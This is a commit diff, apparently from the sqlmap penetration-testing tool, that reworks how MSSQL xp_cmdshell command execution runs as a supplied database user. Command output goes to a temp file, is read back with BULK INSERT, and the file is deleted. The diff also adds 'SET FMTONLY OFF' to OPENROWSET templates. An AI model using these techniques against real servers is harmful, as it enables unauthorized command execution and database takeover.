cleanup for #34

2024-11-22 01:26:42 +03:00 · 2012-07-09 12:39:43 +01:00 · 2012-07-09 12:39:43 +01:00 · 99c5ea54f7
commit 99c5ea54f7
parent d08a54e375
3 changed files with 15 additions and 12 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -820,15 +820,6 @@ class Agent:

    def runAsDBMSUser(self, query):
        if conf.dCred and "Ad Hoc Distributed Queries" not in query:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT %d;%s" % (randomInt(), query)
-
            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))

        return query
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -148,12 +148,18 @@ class xp_cmdshell:
            self.xpCmdshellExecCmd(cmd)

    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
+        if conf.dCred:
+            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)
+
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = "0x%s" % hexencode(cmd)
        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
-        if insertIntoTable:
+
+        if insertIntoTable and not conf.dCred:
            self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
+
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

        return agent.runAsDBMSUser(self.__forgedCmd)
@ -178,6 +184,11 @@ class xp_cmdshell:
                output = new_output
        else:
            inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
+
+            if conf.dCred:
+                inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
+                self.delRemoteFile(self.tmpFile)
+
            query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)

            if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):
--- a/procs/mssqlserver/run_statement_as_user.txt
+++ b/procs/mssqlserver/run_statement_as_user.txt
@ -1,2 +1,3 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
-# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')